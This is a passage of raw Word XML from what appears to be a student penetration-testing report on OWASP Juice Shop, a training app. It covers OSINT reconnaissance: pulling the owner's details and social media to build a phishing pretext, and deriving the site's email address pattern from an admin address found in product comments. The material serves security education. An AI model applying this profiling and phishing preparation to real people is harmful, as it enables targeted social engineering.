          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>system and involved members</w:t>
      </w:r>
      <w:r w:rsidR="00EB231D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">. The information </w:t>
      </w:r>
      <w:r w:rsidR="00CF69A6" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">gathering process </w:t>
      </w:r>
      <w:r w:rsidR="004572DD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidR="00EB231D" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> crucial </w:t>
      </w:r>
      <w:r w:rsidR="003213CC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>for attack surface mapping</w:t>
      </w:r>
      <w:r w:rsidR="00E15850" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidR="008B2305" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">is the most time-consuming in the </w:t>
      </w:r>
      <w:r w:rsidR="00A6718F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>5 stages.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E90595" w14:textId="059425C2" w:rsidR="00E15850" w:rsidRPr="00FA5B3B" w:rsidRDefault="0059404C" w:rsidP="0059404C">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>1.</w:t>
      </w:r>
      <w:r w:rsidR="00DD3253" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00DD3253" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Open Source</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00DD3253" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00290139" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Intelligence (OSINT)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0555823B" w14:textId="7682F3EB" w:rsidR="00A345CA" w:rsidRPr="00FA5B3B" w:rsidRDefault="00F22746" w:rsidP="00A6718F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The hacker will utilize the available public resources online such as </w:t>
      </w:r>
      <w:r w:rsidR="00EB17A8" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>website, email addresses</w:t>
      </w:r>
      <w:r w:rsidR="00A553E3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>, job sites</w:t>
      </w:r>
      <w:r w:rsidR="00DB4649" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00A553E3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">social </w:t>
      </w:r>
      <w:r w:rsidR="00EB0F51" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>networks,</w:t>
      </w:r>
      <w:r w:rsidR="00DB4649" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> and google</w:t>
      </w:r>
      <w:r w:rsidR="00EB0F51" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>-Dorking</w:t>
      </w:r>
      <w:r w:rsidR="00A553E3" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAAF68A" w14:textId="7CE9ECEA" w:rsidR="00C614BC" w:rsidRPr="00FA5B3B" w:rsidRDefault="00F77FDF" w:rsidP="003147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35FF09B" wp14:editId="6F0FC5B6">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>3171825</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>760095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3179445" cy="1028700"/>
            <wp:effectExtent l="0" t="0" r="1905" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1070009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922" name="Picture 1070009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91" r="71733"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="317944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690"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EE1162" wp14:editId="5AD5ADF1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>15240</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>760095</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="3073400" cy="1188720"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="469650910" name="Picture 469650910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50910" name="Picture 469650910" descr="A close up of a person's fac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r="65733" b="77322"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="30734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A14" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The target </w:t>
      </w:r>
      <w:r w:rsidR="00CC1614" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>is a</w:t>
      </w:r>
      <w:r w:rsidR="007F6894" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n ecommerce web app</w:t>
      </w:r>
      <w:r w:rsidR="00D613FA" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">lication </w:t>
      </w:r>
      <w:r w:rsidR="006213AC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>for selling juice.</w:t>
      </w:r>
      <w:r w:rsidR="006C15CC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> Searching around the application, </w:t>
      </w:r>
      <w:r w:rsidR="00AD780E" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>an about us section that</w:t>
      </w:r>
      <w:r w:rsidR="00DB2A09" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> reveals the owner of the website “Mr.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2BFD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DB2A09" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">S” and his </w:t>
      </w:r>
      <w:r w:rsidR="00B16D47" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>contact information.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08D53A32" w14:textId="07F8CDC9" w:rsidR="00B16D47" w:rsidRPr="00FA5B3B" w:rsidRDefault="00B16D47" w:rsidP="00B16D47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 xml:space="preserve">Fig.1 </w:t>
      </w:r>
      <w:r w:rsidR="00890144" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Website’s about us section</w:t>
      </w:r>
      <w:r w:rsidR="0069153C" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>, full page screenshot at appendix 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BA7216E" w14:textId="3F844B8A" w:rsidR="00612603" w:rsidRPr="00FA5B3B" w:rsidRDefault="00123809" w:rsidP="008F79C4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7F1881A" wp14:editId="6FD82F25">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>center</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>662940</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4573270" cy="1388110"/>
            <wp:effectExtent l="0" t="0" r="0" b="2540"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="1993578165" name="Picture 6" descr="A close up of a person's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8165" name="Picture 6" descr="A close up of a person's leg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1FE4EE" wp14:editId="2813C545">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>579120</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>2019300</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4573270" cy="1223645"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="10766924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9240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144" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="00317E98" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Using the information gathered, the attacker managed to find Mr.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2BFD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317E98" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">S’s personal </w:t>
      </w:r>
      <w:r w:rsidR="00554F5B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">social media. The attacker noticed that </w:t>
      </w:r>
      <w:r w:rsidR="00EC2BFD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Mr. S</w:t>
      </w:r>
      <w:r w:rsidR="00554F5B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is </w:t>
      </w:r>
      <w:r w:rsidR="004F418F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>interested in</w:t>
      </w:r>
      <w:r w:rsidR="004B469A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> avocados</w:t>
      </w:r>
      <w:r w:rsidR="00C70FB1" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, an information </w:t>
      </w:r>
      <w:r w:rsidR="00491930" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>the attacker can leverage</w:t>
      </w:r>
      <w:r w:rsidR="002E57FD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> for a</w:t>
      </w:r>
      <w:r w:rsidR="004A3DEC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>n email</w:t>
      </w:r>
      <w:r w:rsidR="002E57FD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4A3DEC" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>phishing</w:t>
      </w:r>
      <w:r w:rsidR="002E57FD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> attack</w:t>
      </w:r>
      <w:r w:rsidR="00F74374" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3835B753" w14:textId="71CAC39E" w:rsidR="00776CD3" w:rsidRPr="00FA5B3B" w:rsidRDefault="001E5615" w:rsidP="007F7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</w:rPr>
        <w:t>Fig.2</w:t>
      </w:r>
      <w:r w:rsidR="00862694" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> Mr.</w:t>
      </w:r>
      <w:r w:rsidR="00EC2BFD" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00862694" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>S’s</w:t>
      </w:r>
      <w:r w:rsidR="00B90F32" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> social</w:t>
      </w:r>
      <w:r w:rsidR="00862694" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> media</w:t>
      </w:r>
      <w:r w:rsidR="00B90F32" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C60DF5" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>and post</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B918832" w14:textId="71EB4BEC" w:rsidR="007F767F" w:rsidRPr="00FA5B3B" w:rsidRDefault="008F79C4" w:rsidP="007F767F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noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251707392" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6595F7BB" wp14:editId="43498371">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>1028700</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>695960</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1546860" cy="1554480"/>
            <wp:effectExtent l="0" t="0" r="0" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="740854338" name="Picture 2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54338" name="Picture 24" descr="A screenshot of a menu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5351" r="19622" b="10698"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="15468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568E2A2" wp14:editId="2FE5C8EA">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="page">
              <wp:posOffset>3771900</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>703580</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1706880" cy="1592580"/>
            <wp:effectExtent l="0" t="0" r="7620" b="7620"/>
            <wp:wrapTopAndBottom/>
            <wp:docPr id="874788404" name="Picture 23" descr="A screenshot of a banana ju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88404" name="Picture 23" descr="A screenshot of a banana juic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4897" r="11355" b="9795"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="170688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67F" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r w:rsidR="009B6828" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Next, </w:t>
      </w:r>
      <w:r w:rsidR="00BD3442" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>in the apple juice product’s comment section</w:t>
      </w:r>
      <w:r w:rsidR="00293177" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">, the hacker finds the </w:t>
      </w:r>
      <w:r w:rsidR="001D5B25" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>credential of the admin account</w:t>
      </w:r>
      <w:r w:rsidR="00FE226B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> is “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001B3F96" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Roboto" w:hAnsi="Roboto"/>
          <w:color w:val="689F38"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:val="clear" w:color="auto" w:fill="424242"/>
        </w:rPr>
        <w:t>admin@juice-sh.op</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FE226B" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidR="00A70290" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">and some other accounts. </w:t>
      </w:r>
      <w:r w:rsidR="00EE1AD7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">The email structure can be </w:t>
      </w:r>
      <w:r w:rsidR="00DB4649" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>concluded</w:t>
      </w:r>
      <w:r w:rsidR="00EE1AD7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> as </w:t>
      </w:r>
      <w:r w:rsidR="007E4828" w:rsidRPr="00FA5B3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E4828" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>usern</w:t>
      </w:r>
      <w:r w:rsidR="00EE1AD7" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ame@juice-sh.op</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="007E4828" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D26BF78" w14:textId="343CC0FC" w:rsidR="00AE1450" w:rsidRPr="00FA5B3B" w:rsidRDefault="00AE1450" w:rsidP="00AE1450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 xml:space="preserve">Fig.3 </w:t>
      </w:r>
      <w:r w:rsidR="00533B3A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="00A70290" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>mail a</w:t>
      </w:r>
      <w:r w:rsidR="007E4828" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>ddress</w:t>
      </w:r>
      <w:r w:rsidR="00533B3A" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>es</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4ED84695" w14:textId="673AF4AF" w:rsidR="007E4828" w:rsidRPr="00FA5B3B" w:rsidRDefault="007E4828" w:rsidP="007E4828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ab/>
        <w:t xml:space="preserve">Furthermore, </w:t>
      </w:r>
      <w:r w:rsidR="003D2818" w:rsidRPr="00FA5B3B">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>within about us, there</w:t>
      </w:r>
      <w:r w:rsidR="001A2FE0" w:rsidRPr="00FA5B3B">
        <w:rPr>
